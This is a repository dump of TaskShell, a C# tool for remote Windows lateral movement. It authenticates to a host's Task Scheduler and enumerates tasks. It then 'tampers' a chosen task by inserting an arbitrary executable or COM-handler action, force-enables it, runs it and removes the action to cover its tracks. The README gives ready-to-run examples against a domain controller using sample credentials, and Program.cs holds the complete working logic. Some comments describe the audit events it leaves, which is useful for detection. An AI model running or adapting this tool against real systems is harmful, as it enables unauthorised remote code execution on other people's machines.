├── .gitignore
├── README.md
├── TaskShell.sln
└── TaskShell
├── App.config
├── FodyWeavers.xml
├── FodyWeavers.xsd
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── TaskShell.csproj
└── packages.config
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.toptal.com/developers/gitignore/api/visualstudio,csharp
3 | # Edit at https://www.toptal.com/developers/gitignore?templates=visualstudio,csharp
4 |
5 | ### Csharp ###
6 | ## Ignore Visual Studio temporary files, build results, and
7 | ## files generated by popular Visual Studio add-ons.
8 | ##
9 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
10 |
11 | # User-specific files
12 | *.rsuser
13 | *.suo
14 | *.user
15 | *.userosscache
16 | *.sln.docstates
17 |
18 | # User-specific files (MonoDevelop/Xamarin Studio)
19 | *.userprefs
20 |
21 | # Mono auto generated files
22 | mono_crash.*
23 |
24 | # Build results
25 | [Dd]ebug/
26 | [Dd]ebugPublic/
27 | [Rr]elease/
28 | [Rr]eleases/
29 | x64/
30 | x86/
31 | [Aa][Rr][Mm]/
32 | [Aa][Rr][Mm]64/
33 | bld/
34 | [Bb]in/
35 | [Oo]bj/
36 | [Ll]og/
37 | [Ll]ogs/
38 |
39 | # Visual Studio 2015/2017 cache/options directory
40 | .vs/
41 | # Uncomment if you have tasks that create the project's static files in wwwroot
42 | #wwwroot/
43 |
44 | # Visual Studio 2017 auto generated files
45 | Generated\ Files/
46 |
47 | # MSTest test Results
48 | [Tt]est[Rr]esult*/
49 | [Bb]uild[Ll]og.*
50 |
51 | # NUnit
52 | *.VisualState.xml
53 | TestResult.xml
54 | nunit-*.xml
55 |
56 | # Build Results of an ATL Project
57 | [Dd]ebugPS/
58 | [Rr]eleasePS/
59 | dlldata.c
60 |
61 | # Benchmark Results
62 | BenchmarkDotNet.Artifacts/
63 |
64 | # .NET Core
65 | project.lock.json
66 | project.fragment.lock.json
67 | artifacts/
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*[.json, .xml, .info]
147 |
148 | # Visual Studio code coverage results
149 | *.coverage
150 | *.coveragexml
151 |
152 | # NCrunch
153 | _NCrunch_*
154 | .*crunch*.local.xml
155 | nCrunchTemp_*
156 |
157 | # MightyMoose
158 | *.mm.*
159 | AutoTest.Net/
160 |
161 | # Web workbench (sass)
162 | .sass-cache/
163 |
164 | # Installshield output folder
165 | [Ee]xpress/
166 |
167 | # DocProject is a documentation generator add-in
168 | DocProject/buildhelp/
169 | DocProject/Help/*.HxT
170 | DocProject/Help/*.HxC
171 | DocProject/Help/*.hhc
172 | DocProject/Help/*.hhk
173 | DocProject/Help/*.hhp
174 | DocProject/Help/Html2
175 | DocProject/Help/html
176 |
177 | # Click-Once directory
178 | publish/
179 |
180 | # Publish Web Output
181 | *.[Pp]ublish.xml
182 | *.azurePubxml
183 | # Note: Comment the next line if you want to checkin your web deploy settings,
184 | # but database connection strings (with potential passwords) will be unencrypted
185 | *.pubxml
186 | *.publishproj
187 |
188 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
189 | # checkin your Azure Web App publish settings, but sensitive information contained
190 | # in these scripts will be unencrypted
191 | PublishScripts/
192 |
193 | # NuGet Packages
194 | *.nupkg
195 | # NuGet Symbol Packages
196 | *.snupkg
197 | # The packages folder can be ignored because of Package Restore
198 | **/[Pp]ackages/*
199 | # except build/, which is used as an MSBuild target.
200 | !**/[Pp]ackages/build/
201 | # Uncomment if necessary however generally it will be regenerated when needed
202 | #!**/[Pp]ackages/repositories.config
203 | # NuGet v3's project.json files produces more ignorable files
204 | *.nuget.props
205 | *.nuget.targets
206 |
207 | # Microsoft Azure Build Output
208 | csx/
209 | *.build.csdef
210 |
211 | # Microsoft Azure Emulator
212 | ecf/
213 | rcf/
214 |
215 | # Windows Store app package directories and files
216 | AppPackages/
217 | BundleArtifacts/
218 | Package.StoreAssociation.xml
219 | _pkginfo.txt
220 | *.appx
221 | *.appxbundle
222 | *.appxupload
223 |
224 | # Visual Studio cache files
225 | # files ending in .cache can be ignored
226 | *.[Cc]ache
227 | # but keep track of directories ending in .cache
228 | !?*.[Cc]ache/
229 |
230 | # Others
231 | ClientBin/
232 | ~$*
233 | *~
234 | *.dbmdl
235 | *.dbproj.schemaview
236 | *.jfm
237 | *.pfx
238 | *.publishsettings
239 | orleans.codegen.cs
240 |
241 | # Including strong name key files (*.snk) in the repository can present a security risk; the rule below is commented out, so they are NOT ignored
242 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
243 | #*.snk
244 |
245 | # Since there are multiple workflows, uncomment next line to ignore bower_components
246 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
247 | #bower_components/
248 |
249 | # RIA/Silverlight projects
250 | Generated_Code/
251 |
252 | # Backup & report files from converting an old project file
253 | # to a newer Visual Studio version. Backup files are not needed,
254 | # because we have git ;-)
255 | _UpgradeReport_Files/
256 | Backup*/
257 | UpgradeLog*.XML
258 | UpgradeLog*.htm
259 | ServiceFabricBackup/
260 | *.rptproj.bak
261 |
262 | # SQL Server files
263 | *.mdf
264 | *.ldf
265 | *.ndf
266 |
267 | # Business Intelligence projects
268 | *.rdl.data
269 | *.bim.layout
270 | *.bim_*.settings
271 | *.rptproj.rsuser
272 | *- [Bb]ackup.rdl
273 | *- [Bb]ackup ([0-9]).rdl
274 | *- [Bb]ackup ([0-9][0-9]).rdl
275 |
276 | # Microsoft Fakes
277 | FakesAssemblies/
278 |
279 | # GhostDoc plugin setting file
280 | *.GhostDoc.xml
281 |
282 | # Node.js Tools for Visual Studio
283 | .ntvs_analysis.dat
284 | node_modules/
285 |
286 | # Visual Studio 6 build log
287 | *.plg
288 |
289 | # Visual Studio 6 workspace options file
290 | *.opt
291 |
292 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
293 | *.vbw
294 |
295 | # Visual Studio LightSwitch build output
296 | **/*.HTMLClient/GeneratedArtifacts
297 | **/*.DesktopClient/GeneratedArtifacts
298 | **/*.DesktopClient/ModelManifest.xml
299 | **/*.Server/GeneratedArtifacts
300 | **/*.Server/ModelManifest.xml
301 | _Pvt_Extensions
302 |
303 | # Paket dependency manager
304 | .paket/paket.exe
305 | paket-files/
306 |
307 | # FAKE - F# Make
308 | .fake/
309 |
310 | # CodeRush personal settings
311 | .cr/personal
312 |
313 | # Python Tools for Visual Studio (PTVS)
314 | __pycache__/
315 | *.pyc
316 |
317 | # Cake - Uncomment if you are using it
318 | # tools/**
319 | # !tools/packages.config
320 |
321 | # Tabs Studio
322 | *.tss
323 |
324 | # Telerik's JustMock configuration file
325 | *.jmconfig
326 |
327 | # BizTalk build output
328 | *.btp.cs
329 | *.btm.cs
330 | *.odx.cs
331 | *.xsd.cs
332 |
333 | # OpenCover UI analysis results
334 | OpenCover/
335 |
336 | # Azure Stream Analytics local run output
337 | ASALocalRun/
338 |
339 | # MSBuild Binary and Structured Log
340 | *.binlog
341 |
342 | # NVidia Nsight GPU debugger configuration file
343 | *.nvuser
344 |
345 | # MFractors (Xamarin productivity tool) working folder
346 | .mfractor/
347 |
348 | # Local History for Visual Studio
349 | .localhistory/
350 |
351 | # BeatPulse healthcheck temp database
352 | healthchecksdb
353 |
354 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
355 | MigrationBackup/
356 |
357 | # Ionide (cross platform F# VS Code tools) working folder
358 | .ionide/
359 |
360 | ### VisualStudio ###
361 |
362 | # User-specific files
363 |
364 | # User-specific files (MonoDevelop/Xamarin Studio)
365 |
366 | # Mono auto generated files
367 |
368 | # Build results
369 |
370 | # Visual Studio 2015/2017 cache/options directory
371 | # Uncomment if you have tasks that create the project's static files in wwwroot
372 |
373 | # Visual Studio 2017 auto generated files
374 |
375 | # MSTest test Results
376 |
377 | # NUnit
378 |
379 | # Build Results of an ATL Project
380 |
381 | # Benchmark Results
382 |
383 | # .NET Core
384 |
385 | # StyleCop
386 |
387 | # Files built by Visual Studio
388 |
389 | # Chutzpah Test files
390 |
391 | # Visual C++ cache files
392 |
393 | # Visual Studio profiler
394 |
395 | # Visual Studio Trace Files
396 |
397 | # TFS 2012 Local Workspace
398 |
399 | # Guidance Automation Toolkit
400 |
401 | # ReSharper is a .NET coding add-in
402 |
403 | # TeamCity is a build add-in
404 |
405 | # DotCover is a Code Coverage Tool
406 |
407 | # AxoCover is a Code Coverage Tool
408 |
409 | # Coverlet is a free, cross platform Code Coverage Tool
410 |
411 | # Visual Studio code coverage results
412 |
413 | # NCrunch
414 |
415 | # MightyMoose
416 |
417 | # Web workbench (sass)
418 |
419 | # Installshield output folder
420 |
421 | # DocProject is a documentation generator add-in
422 |
423 | # Click-Once directory
424 |
425 | # Publish Web Output
426 | # Note: Comment the next line if you want to checkin your web deploy settings,
427 | # but database connection strings (with potential passwords) will be unencrypted
428 |
429 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
430 | # checkin your Azure Web App publish settings, but sensitive information contained
431 | # in these scripts will be unencrypted
432 |
433 | # NuGet Packages
434 | # NuGet Symbol Packages
435 | # The packages folder can be ignored because of Package Restore
436 | # except build/, which is used as an MSBuild target.
437 | # Uncomment if necessary however generally it will be regenerated when needed
438 | # NuGet v3's project.json files produces more ignorable files
439 |
440 | # Microsoft Azure Build Output
441 |
442 | # Microsoft Azure Emulator
443 |
444 | # Windows Store app package directories and files
445 |
446 | # Visual Studio cache files
447 | # files ending in .cache can be ignored
448 | # but keep track of directories ending in .cache
449 |
450 | # Others
451 |
452 | # Including strong name files can present a security risk
453 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
454 |
455 | # Since there are multiple workflows, uncomment next line to ignore bower_components
456 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
457 |
458 | # RIA/Silverlight projects
459 |
460 | # Backup & report files from converting an old project file
461 | # to a newer Visual Studio version. Backup files are not needed,
462 | # because we have git ;-)
463 |
464 | # SQL Server files
465 |
466 | # Business Intelligence projects
467 |
468 | # Microsoft Fakes
469 |
470 | # GhostDoc plugin setting file
471 |
472 | # Node.js Tools for Visual Studio
473 |
474 | # Visual Studio 6 build log
475 |
476 | # Visual Studio 6 workspace options file
477 |
478 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
479 |
480 | # Visual Studio LightSwitch build output
481 |
482 | # Paket dependency manager
483 |
484 | # FAKE - F# Make
485 |
486 | # CodeRush personal settings
487 |
488 | # Python Tools for Visual Studio (PTVS)
489 |
490 | # Cake - Uncomment if you are using it
491 | # tools/**
492 | # !tools/packages.config
493 |
494 | # Tabs Studio
495 |
496 | # Telerik's JustMock configuration file
497 |
498 | # BizTalk build output
499 |
500 | # OpenCover UI analysis results
501 |
502 | # Azure Stream Analytics local run output
503 |
504 | # MSBuild Binary and Structured Log
505 |
506 | # NVidia Nsight GPU debugger configuration file
507 |
508 | # MFractors (Xamarin productivity tool) working folder
509 |
510 | # Local History for Visual Studio
511 |
512 | # BeatPulse healthcheck temp database
513 |
514 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
515 |
516 | # Ionide (cross platform F# VS Code tools) working folder
517 |
518 | # End of https://www.toptal.com/developers/gitignore/api/visualstudio,csharp
519 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # TaskShell
2 |
3 | ## Usage
4 |
5 | ```
6 |
7 | -h, --Host Required. The remote host
8 |
9 | -u, --Username The username
10 |
11 | -p, --Password The password
12 |
13 | -d, --Domain The remote domain
14 |
15 | -t, --Task Fetch info of a specific task
16 |
17 | -b, --Binary The binary to tamper the scheduled task with
18 |
19 | -a, --arguments Additional command line arguments for the task
20 |
21 | -r, --Run Run the task after modifying it
22 |
23 | -s, --Search Search for a specific task
24 |
25 | -c, --Clsid The CLSID to use as a COM handler
26 |
27 | --help Display this help screen.
28 |
29 | --version Display version information.
30 | ```
31 |
32 | ## Examples
33 |
34 | ```
35 | # Enumerate tasks on a remote host using current user
36 | TaskShell.exe -h DC01
37 |
38 | # Authenticate using explicit credentials
39 | TaskShell.exe -h DC01 -u Administrator -p Password1 -d domain.com
40 |
41 | # Search for a task name (case sensitive)
42 | TaskShell.exe -h DC01 -s "OneDrive"
43 |
44 | # or a user
45 | TaskShell.exe -h DC01 -s "SYSTEM"
46 |
47 | TaskShell.exe -h DC01 -s "Users"
48 |
49 | # Get info about a specific task
50 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
51 | Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"
52 |
53 | # Tamper the task with a binary action
54 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
55 | Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" -b notepad.exe -r
56 |
57 | # using arguments is supported as well
58 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Mobi
59 | le Broadband Accounts\MNO Metadata Parser" -b cmd.exe -a "/C notepad.exe" -r
60 |
61 | # Tamper the task with a COM handler
62 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
63 | Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" -c "75DFF2B7-6936-4C06-A8BB-676A7B00B24B" -r
64 |
65 | ```
--------------------------------------------------------------------------------
/TaskShell.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29806.167
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TaskShell", "TaskShell\TaskShell.csproj", "{AB4120BD-140B-41DC-BD9F-33C935F48CFE}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {162D6049-71D4-465C-AE35-926641D45D9B}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/TaskShell/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/TaskShell/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/TaskShell/FodyWeavers.xsd:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
13 |
14 |
15 |
16 |
17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
18 |
19 |
20 |
21 |
22 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
23 |
24 |
25 |
26 |
27 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
28 |
29 |
30 |
31 |
32 | The order of preloaded assemblies, delimited with line breaks.
33 |
34 |
35 |
36 |
37 |
38 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
39 |
40 |
41 |
42 |
43 | Controls if .pdbs for reference assemblies are also embedded.
44 |
45 |
46 |
47 |
48 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
49 |
50 |
51 |
52 |
53 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
54 |
55 |
56 |
57 |
58 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
59 |
60 |
61 |
62 |
63 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
64 |
65 |
66 |
67 |
68 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
69 |
70 |
71 |
72 |
73 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
74 |
75 |
76 |
77 |
78 | A list of unmanaged 32 bit assembly names to include, delimited with |.
79 |
80 |
81 |
82 |
83 | A list of unmanaged 64 bit assembly names to include, delimited with |.
84 |
85 |
86 |
87 |
88 | The order of preloaded assemblies, delimited with |.
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
97 |
98 |
99 |
100 |
101 | A comma-separated list of error codes that can be safely ignored in assembly verification.
102 |
103 |
104 |
105 |
106 | 'false' to turn off automatic generation of the XML Schema file.
107 |
108 |
109 |
110 |
111 |
--------------------------------------------------------------------------------
/TaskShell/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using CommandLine;
7 | using Microsoft.Win32.TaskScheduler;
8 | using Action = Microsoft.Win32.TaskScheduler.Action;
9 | using Task = Microsoft.Win32.TaskScheduler.Task;
10 | using Microsoft.Win32;
11 |
12 |
13 | namespace TaskShell
14 | {
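/// <summary>
/// Command-line options for TaskShell, bound by the CommandLine parser through
/// the <c>[Option]</c> attributes on each property.
/// </summary>
/// <remarks>
/// Only <see cref="Host"/> is required. Options that are not supplied stay
/// <c>null</c> (or <c>false</c> for <see cref="Run"/>), and <c>Main</c> chooses
/// between enumeration, task lookup and task modification from which of them are set.
/// The password is taken as a plain command-line argument, so it is exposed to
/// anything that records process command lines on the machine the tool runs on.
/// </remarks>
public class Options
{
    // Target machine whose Task Scheduler service is contacted.
    [Option('h', "Host", Required = true, HelpText = "The remote host")]
    public string Host { get; set; }

    // Account name for explicit authentication. The help text previously
    // repeated "The remote host", which described the wrong option.
    [Option('u', "Username", Required = false, HelpText = "The username")]
    public string Username { get; set; }

    // Password for explicit authentication (visible on the command line).
    [Option('p', "Password", Required = false, HelpText = "The password")]
    public string Password { get; set; }

    // Domain of the account used for explicit authentication.
    [Option('d', "Domain", Required = false, HelpText = "The remote domain")]
    public string Domain { get; set; }

    // Full path of one scheduled task to inspect or modify.
    [Option('t', "Task", Required = false, HelpText = "Fetch info of a specific task")]
    public string Task { get; set; }

    // Executable to insert as an extra action of the selected task.
    [Option('b', "Binary", Required = false, HelpText = "The binary to tamper the scheduled task with")]
    public string Binary { get; set; }

    // Arguments passed to the executable given with --Binary.
    [Option('a', "arguments", Required = false, HelpText = "Additional command line arguments for the task")]
    public string Arguments { get; set; }

    // When set, the task is started right after it has been modified.
    [Option('r', "Run", Required = false, HelpText = "Run the task after modifying it")]
    public bool Run { get; set; }

    // Substring filter applied to task paths and principals during enumeration.
    [Option('s', "Search", Required = false, HelpText = "Search for a specific task")]
    public string Search { get; set; }

    // CLSID of a COM handler to insert instead of an executable action.
    [Option('c', "Clsid", Required = false, HelpText = "The CLSID to use as a COM handler")]
    public string Clsid { get; set; }
}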
48 |
49 | class Program
50 | {
/// <summary>
/// Opens a <c>TaskService</c> connection to <c>\\host</c>.
/// </summary>
/// <param name="host">Machine name or address; prefixed with <c>\\</c> before use.</param>
/// <param name="username">Account name for explicit authentication, or null.</param>
/// <param name="password">Password for explicit authentication, or null.</param>
/// <param name="domain">Domain for explicit authentication, or null.</param>
/// <returns>
/// The connected service, or null when the connection was refused with
/// <c>UnauthorizedAccessException</c>.
/// </returns>
/// <remarks>
/// Explicit credentials are used only when username, password and domain are ALL
/// non-null; if any one of them is missing the call silently falls back to the
/// current user's token. Only <c>UnauthorizedAccessException</c> is handled here,
/// so any other exception raised by the constructor propagates to the caller.
/// </remarks>
static TaskService AuthenticateToRemoteHost(string host = "127.0.0.1", string username = "", string password = "", string domain = "")
{
    string uncTarget = @"\\" + host;
    bool explicitCreds = username != null && password != null && domain != null;

    try
    {
        if (!explicitCreds)
        {
            Console.WriteLine("[+] Authenticating using current user's token");
            return new TaskService(uncTarget);
        }

        Console.WriteLine("[+] Authenticating using explicit credentials");
        // Note the argument order: user, then domain, then password.
        return new TaskService(uncTarget, username, domain, password);
    }
    catch (System.UnauthorizedAccessException denied)
    {
        Console.WriteLine("[-] Something went wrong with the authentication, check your creds: " + denied.Message);
        return null;
    }
}
/// <summary>
/// Connects to <paramref name="host"/> and lists every scheduled task under the
/// root folder that matches <paramref name="search"/>.
/// </summary>
/// <param name="search">Substring filter handed to <c>EnumFolderTasks</c>; "" lists everything.</param>
static void EnumAllTasks(string search, string host = "127.0.0.1", string username = "", string password = "", string domain = "")
{
    TaskService session = AuthenticateToRemoteHost(host, username, password, domain);

    // A null session means authentication failed; the failure was already reported.
    if (session == null)
    {
        return;
    }

    EnumFolderTasks(search, session.RootFolder);
}
83 |
/// <summary>
/// Connects to <paramref name="host"/>, looks up a single task by its full path
/// and prints its details through <c>ActOnTask</c>.
/// </summary>
/// <param name="taskName">Full task path passed to <c>TaskService.GetTask</c>.</param>
static void GetTaskInfo(string taskName, string host = "127.0.0.1", string username = "", string password = "", string domain = "")
{
    TaskService session = AuthenticateToRemoteHost(host, username, password, domain);
    if (session == null)
    {
        // Authentication failed and has already been reported.
        return;
    }

    Task located = session.GetTask(taskName);
    if (located != null)
    {
        ActOnTask(located);
        return;
    }

    Console.WriteLine("[+] Task not found!");
}
99 |
/// <summary>
/// Recursively walks a Task Scheduler folder: every task in <paramref name="fld"/>
/// is passed to <c>ActOnTask</c> first, then each sub-folder is visited in turn.
/// </summary>
/// <param name="search">Substring filter forwarded unchanged to <c>ActOnTask</c>.</param>
/// <param name="fld">Folder to enumerate.</param>
static void EnumFolderTasks(string search, TaskFolder fld)
{
    // Tasks that live directly in this folder.
    foreach (Task entry in fld.Tasks)
    {
        ActOnTask(entry, search);
    }

    // Then descend into each child folder.
    foreach (TaskFolder child in fld.SubFolders)
    {
        EnumFolderTasks(search, child);
    }
}
107 |
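/// <summary>
/// Prints the path, principal, actions and triggers of a task when its path or
/// its principal contains <paramref name="search"/>.
/// </summary>
/// <param name="t">Task to report on.</param>
/// <param name="search">
/// Case-sensitive substring filter; "" (or null) matches every task.
/// </param>
/// <remarks>
/// Triggers are printed once per task. They used to be printed inside the action
/// loop, which repeated the full trigger list for every action and printed none
/// for a task without actions. The empty <c>if (search != "")</c> block was dead
/// code and has been dropped.
/// </remarks>
static void ActOnTask(Task t, string search = "")
{
    // string.Contains(null) throws, so a missing filter is treated as "match all".
    string filter = search ?? "";

    bool matches = t.Path.Contains(filter) || t.Definition.Principal.ToString().Contains(filter);
    if (!matches)
    {
        return;
    }

    Console.WriteLine("\r\n============================");
    Console.WriteLine("[+] Path: " + t.Path);
    Console.WriteLine("[+] Principal: " + t.Definition.Principal);

    foreach (Action action in t.Definition.Actions)
    {
        Console.WriteLine("[+] Action: " + action.ToString());
    }

    foreach (Trigger trigger in t.Definition.Triggers)
    {
        Console.WriteLine(trigger.ToString());
    }
}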
139 |
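/// <summary>
/// Entry point: parses the command line into <c>Options</c> and dispatches to
/// task lookup, task modification or enumeration.
/// </summary>
/// <remarks>
/// Dispatch rules, in order:
/// 1. --Task only: print that task's details.
/// 2. --Task with --Binary: modify the task with an executable action
///    (--Binary wins when --Clsid is given as well).
/// 3. --Task with --Clsid: modify the task with a COM handler action.
/// 4. Otherwise: enumerate all tasks, filtered by --Search when present.
///    --Binary or --Clsid without --Task are ignored and end up here.
/// The parser call names <c>Options</c> as its type argument, which the lambda
/// needs in order to read the option properties; the unused local <c>Options</c>
/// instance was removed.
/// </remarks>
static void Main(string[] args)
{
    Parser.Default.ParseArguments<Options>(args).WithParsed(o =>
    {
        if (o.Host == null)
        {
            Console.WriteLine("[-] missing host parameter");
            return;
        }

        bool taskGiven = o.Task != null;

        if (taskGiven && o.Binary == null && o.Clsid == null)
        {
            // Read-only: show one specific task.
            GetTaskInfo(o.Task, o.Host, o.Username, o.Password, o.Domain);
        }
        else if (taskGiven && o.Binary != null)
        {
            // Modifies the remote task definition (executable action).
            TamperTask(o.Task, o.Binary, o.Arguments, o.Run, o.Host, o.Username, o.Password, o.Domain);
        }
        else if (taskGiven && o.Clsid != null)
        {
            // Modifies the remote task definition (COM handler action); the
            // CLSID travels in TamperTask's "binary" parameter.
            Console.WriteLine("LOLL");
            TamperTask(o.Task, o.Clsid, "", o.Run, o.Host, o.Username, o.Password, o.Domain);
        }
        else
        {
            // Default: enumerate every task, with an empty filter when no
            // search term was supplied.
            EnumAllTasks(o.Search ?? "", o.Host, o.Username, o.Password, o.Domain);
        }
    });
}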
185 |
/// <summary>
/// Inserts an extra action at index 0 of an existing scheduled task on
/// <paramref name="host"/>, optionally starts the task, then removes the action.
/// </summary>
/// <param name="task">Full path of the task to modify.</param>
/// <param name="binary">
/// Executable path, or a CLSID string. It is treated as a CLSID when splitting
/// it on '-' yields exactly five parts; no further validation is done before it
/// is handed to the <c>Guid</c> constructor.
/// </param>
/// <param name="arguments">Arguments for the executable action; unused for a CLSID.</param>
/// <param name="run">When true the task is started after the modification.</param>
/// <remarks>
/// What this leaves behind on the target, for anyone reviewing or monitoring its use:
/// - The definition is registered twice (insert, then removal), so the task
///   shows two updates in quick succession. With the relevant auditing enabled
///   these typically surface as Security event 4702, which carries the new task
///   XML, and as event 140 in the TaskScheduler Operational log.
/// - <c>Settings.Enabled</c> is forced to true and never restored, so a task
///   that was disabled beforehand stays enabled afterwards.
/// - The removal is not guarded by try/finally: if the info dump or
///   <c>Run()</c> throws, the inserted action stays in the task definition.
/// </remarks>
private static void TamperTask(string task, string binary, string arguments, bool run, string host, string username, string password, string domain)
{
    TaskService session = AuthenticateToRemoteHost(host, username, password, domain);
    if (session == null)
    {
        return;
    }

    Task target = session.GetTask(task);
    if (target == null)
    {
        Console.WriteLine("[+] Task not found!");
        return;
    }

    // Shape check only: five dash-separated parts are taken to mean a CLSID.
    bool looksLikeClsid = binary.Split('-').Length == 5;

    if (!looksLikeClsid)
    {
        ExecAction execAction = new ExecAction(binary, arguments, null);

        // Index 0 puts the new action ahead of the task's existing actions.
        Console.WriteLine("[+] Adding custom action to task.. ");
        target.Definition.Actions.Insert(0, execAction);

        // The task is enabled unconditionally; its previous state is not recorded.
        Console.WriteLine("[+] Enabling the task");
        target.Definition.Settings.Enabled = true;
        target.RegisterChanges();

        // Re-reads the task over a fresh connection and prints the modified definition.
        GetTaskInfo(task, host, username, password, domain);
        Console.WriteLine("\r\n");

        if (run)
        {
            Console.WriteLine("[+] Triggering execution");
            target.Run();
        }

        // Second registration: takes the inserted action out again.
        Console.WriteLine("[+] Cleaning up");
        target.Definition.Actions.Remove(execAction);
        target.RegisterChanges();
    }
    else
    {
        ComHandlerAction comAction = new ComHandlerAction(new Guid(binary), string.Empty);

        // Index 0 puts the new action ahead of the task's existing actions.
        Console.WriteLine("[+] Adding custom action to task.. ");
        target.Definition.Actions.Insert(0, comAction);

        // The task is enabled unconditionally; its previous state is not recorded.
        Console.WriteLine("[+] Enabling the task");
        target.Definition.Settings.Enabled = true;
        target.RegisterChanges();

        // Re-reads the task over a fresh connection and prints the modified definition.
        GetTaskInfo(task, host, username, password, domain);
        Console.WriteLine("\r\n");

        if (run)
        {
            Console.WriteLine("[+] Triggering execution");
            target.Run();
        }

        // Second registration: takes the inserted action out again.
        Console.WriteLine("[+] Cleaning up");
        target.Definition.Actions.Remove(comAction);
        target.RegisterChanges();
    }
}
259 | }
260 | }
261 |
--------------------------------------------------------------------------------
/TaskShell/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly identity metadata. Title and product carry the project name; the
